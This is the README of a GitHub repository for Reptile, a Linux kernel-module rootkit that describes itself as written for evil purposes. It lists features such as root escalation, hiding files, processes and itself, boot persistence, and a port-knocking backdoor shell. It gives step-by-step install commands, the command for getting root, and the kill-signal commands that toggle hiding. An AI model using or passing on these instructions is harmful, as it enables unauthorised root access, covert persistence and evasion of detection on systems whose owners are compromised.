https://github.com/f0rb1dd3n/Reptile

C
LKM Linux rootkit

Reptile

Reptile is a LKM rootkit written for evil purposes that runs on kernel 2.6.x/3.x/4.x.
Would you like to see his fatality?

Features

• Give root to unprivileged users
• Hide files and directories
• Hide files contents
• Hide processes
• Hide himself
• Hidden boot persistence
• ICMP/UDP/TCP port-knocking backdoor
• Full TTY/PTY shell with file transfer
• Client to handle Reptile Shell

Roadmap

• Socket/Packet hiding

Install

apt-get install linux-headers-$(uname -r)
git clone https://github.com/f0rb1dd3n/Reptile.git
cd Reptile
./installer.sh install

Uninstall

./installer.sh remove

Usage

Binaries will be copied to /reptile folder (or any name you chose), that will be hidden by Reptile.

Getting root privileges

Just run: /reptile/reptile_r00t

Hiding

• Hide/unhide reptile module: kill -50 0
• Hide/unhide process: kill -49 <PID>
• Hide files contents: kill -51 0 and all content between the tags will be hidden

Example:

#<reptile> 
content to hide 
#</reptile>

Backdoor

You use the client to send magic packets and get your full TTY encrypted shell!

More informations: Reptile Shell

Disclaimer

Some functions of this module is based on another rootkits. Please see the references!

References

• “LKM HACKING”, The Hackers Choice (THC), 1999;
• https://github.com/mncoppola/suterusu
• https://github.com/m0nad/Diamorphine.git
• https://github.com/David-Reguera-Garcia-Dreg/enyelkm.git
• https://github.com/maK-/maK_it-Linux-Rootkit
• “Abuse of the Linux Kernel for Fun and Profit”, Halflife, Phrack 50, 1997;
• https://ruinedsec.wordpress.com/2013/04/04/modifying-system-calls-dispatching-linux/
• https://github.com/creaktive/tsh
• http://www.drkns.net/kernel-who-does-magic/